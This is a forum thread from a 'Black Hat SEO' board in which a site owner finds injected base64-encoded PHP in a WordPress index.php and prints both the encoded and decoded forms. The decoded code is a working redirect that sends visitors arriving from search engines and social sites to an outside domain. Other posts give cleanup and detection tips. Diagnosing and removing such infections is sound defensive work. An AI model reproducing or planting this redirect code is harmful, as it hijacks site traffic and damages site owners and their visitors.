1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

When I search my domain in google, it redirects... HELP!

Discussion in 'Black Hat SEO' started by ardley216, Jan 21, 2012.

  1. ardley216

    ardley216 Elite Member

    Joined:
    Mar 28, 2008
    Messages:
    2,391
    Likes Received:
    2,356
    Occupation:
    Finding easy keywords
    Location:
    1,500,000,000 Keywords Re
    Home Page:
    I bought a url for my girlfriend (her-name.com), built her a website for christmas :)

    But she searched it in google and it redirects to some polish site

    Code:
    http://www.bee.pl/index.html 
    But when I visit the url directly, it goes to her site?

    WTF is happening? has someone hacked something somewhere?

    Help needed ASAP :)
     
  2. keinehabe

    keinehabe Supreme Member

    Joined:
    Nov 4, 2008
    Messages:
    1,207
    Likes Received:
    472
    Gender:
    Male
    Occupation:
    -= CEO =-
    Location:
    Heaven
    Home Page:
    check your .htaccess file :) most probably your host just screwed !
     
  3. ardley216

    ardley216 Elite Member

    Joined:
    Mar 28, 2008
    Messages:
    2,391
    Likes Received:
    2,356
    Occupation:
    Finding easy keywords
    Location:
    1,500,000,000 Keywords Re
    Home Page:
    checked. Noting out of the ordinary

    Code:
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . //index.php [L]
    </IfModule>
    
    # END WordPress
     
  4. ardley216

    ardley216 Elite Member

    Joined:
    Mar 28, 2008
    Messages:
    2,391
    Likes Received:
    2,356
    Occupation:
    Finding easy keywords
    Location:
    1,500,000,000 Keywords Re
    Home Page:
    Any other solutions?
     
  5. gsy159

    gsy159 Power Member

    Joined:
    Apr 29, 2011
    Messages:
    657
    Likes Received:
    158
    look in your cpanel, look in your index.php
     
  6. ardley216

    ardley216 Elite Member

    Joined:
    Mar 28, 2008
    Messages:
    2,391
    Likes Received:
    2,356
    Occupation:
    Finding easy keywords
    Location:
    1,500,000,000 Keywords Re
    Home Page:
    Ok, done, but what am I looking for?
     
  7. gsy159

    gsy159 Power Member

    Joined:
    Apr 29, 2011
    Messages:
    657
    Likes Received:
    158
    in Cpanel search for "redirects" and in your index.php/.html
    search for
    <script location="http://blabla.com"> OR

    <script language="JavaScript"><!--
    window.location.href="http://blabla.com";
    // --></script>

    OR

    <META HTTP-EQUIV="refresh" CONTENT="sekunden;URL="http://blabla.com">
     
  8. ardley216

    ardley216 Elite Member

    Joined:
    Mar 28, 2008
    Messages:
    2,391
    Likes Received:
    2,356
    Occupation:
    Finding easy keywords
    Location:
    1,500,000,000 Keywords Re
    Home Page:
    I found it. I found some base64 code in the top of my wordpress index.php

    Code:
    DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ==
    decoded to:

    Code:
    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"************") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
    header("Location: http://contento.bee.pl/");
    exit();
    }
    }
    }
    }

    BASTARD! lol...

    Now I have to go check every index.php/html I got on my server:headache:
     
  9. gsy159

    gsy159 Power Member

    Joined:
    Apr 29, 2011
    Messages:
    657
    Likes Received:
    158
    First of all try to close the Security Bug
     
  10. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    Had a similar thing happen on my vps, all my sites under one account got affected, basiclly they hid redirects at the bottom of the .htaccess file (double check your .htaccess file to be sure there is nothing at the bottom of the file and it hasnt been modified recently)
    Google SERPs never recovered for about 15 of my sites dispite reinclusion requests.

    bastards
     
  11. ardley216

    ardley216 Elite Member

    Joined:
    Mar 28, 2008
    Messages:
    2,391
    Likes Received:
    2,356
    Occupation:
    Finding easy keywords
    Location:
    1,500,000,000 Keywords Re
    Home Page:
    yeah, jsut going through all the index's in my server.. luckily the ones affected dont seem to be ones that rely on search results
     
  12. ardley216

    ardley216 Elite Member

    Joined:
    Mar 28, 2008
    Messages:
    2,391
    Likes Received:
    2,356
    Occupation:
    Finding easy keywords
    Location:
    1,500,000,000 Keywords Re
    Home Page:
    How do I find the bug? lol..
     
  13. SEOWhizz

    SEOWhizz Power Member

    Joined:
    Oct 22, 2011
    Messages:
    606
    Likes Received:
    432
    Location:
    Lat: 38N 43' 11.298" Long: 27W 12' 7.733"
    Maybe 'bug' = 'loop hole'. :)

    WordPress has a history of being hacked into. There's some good tips for improving WP security here:

    Code:
    http://www.problogdesign.com/wordpress/11-best-ways-to-improve-wordpress-security/
    Code:
    http://www.blackhatworld.com/blackhat-seo/templates-themes/374678-amazing-tools-detecting-hacked-themes.html
    Also, remember to do backups. :cool:
     
  14. ardley216

    ardley216 Elite Member

    Joined:
    Mar 28, 2008
    Messages:
    2,391
    Likes Received:
    2,356
    Occupation:
    Finding easy keywords
    Location:
    1,500,000,000 Keywords Re
    Home Page:
    Awesome thanks.
    And I always back up the vital sites :)
     
  15. Crewchief007

    Crewchief007 Power Member

    Joined:
    May 27, 2009
    Messages:
    731
    Likes Received:
    525
    Gender:
    Male
    Occupation:
    Internet Marketer
    Location:
    Online
    Ardley216, a few questions that would help others out.

    *Were you using a cracked, nulled or free version of a WordPress theme?

    *Or, did you otherwise acquire your theme from a potentially dangerous source?

    *Had you performed all of the stated updates for WP?

    Just curious as to how your site was breached..

    Glad you figured things out.
     
  16. Lutherblissett

    Lutherblissett Regular Member

    Joined:
    Feb 10, 2008
    Messages:
    479
    Likes Received:
    178
    Wordpress is probably the largest hole into your server unless you are constantly updating/ Leave one unupdated for a bit and your whole server will be compromised. Its getting worse as well. . . I don't ever recommend using it.
     
  17. soull

    soull Junior Member

    Joined:
    May 19, 2011
    Messages:
    151
    Likes Received:
    35
    Look base64 code ;)
     
  18. HostStage

    HostStage Jr. VIP Jr. VIP Premium Member UnGagged Attendee

    Joined:
    May 20, 2010
    Messages:
    1,773
    Likes Received:
    1,730
    Occupation:
    BHW - CEO of Webhosting Company
    Location:
    BWH from France
    Home Page:
    THe code you have is maybe the blackhole exploit.

    I believe you are using filezilla as FTP server. Well basically, you may have a virus in your computer which is stealing the XML which contains all your FTP credentials.

    Then, it automatically connects to place this curl/php/js code in all your index.php.

    If you don't do anything quick and if this is the black hole exploit, your cpanel files could even be corrupted and you'll be good to do a clean reinstall.

    This thing is a literaly a pain in the ass to remove.

    With a hosting customer of mine we spent ages to find the proper antivirus which would block the exploit but not even removing it.

    You may want to go with AVG free edition.

    Another lead would also be the source of your wordpress theme.
     
    • Thanks Thanks x 2
    Last edited: Jan 21, 2012
  19. agregat

    agregat Newbie

    Joined:
    May 19, 2011
    Messages:
    1
    Likes Received:
    0
    My account was also hacked. What I learned while cleaning my websites that the code is placed not just in index.php, but practically in ALL .php files of the wordpress. What I ended up doing is compressing all the files, download the zip to my computer and then cleaned all php files wit "search and replace" software . On every website there were at least 50 places with the code inserted !
    The other option is to do clean re-install. I could not do this because of some custom codes on my websites
    Glad if this helps :)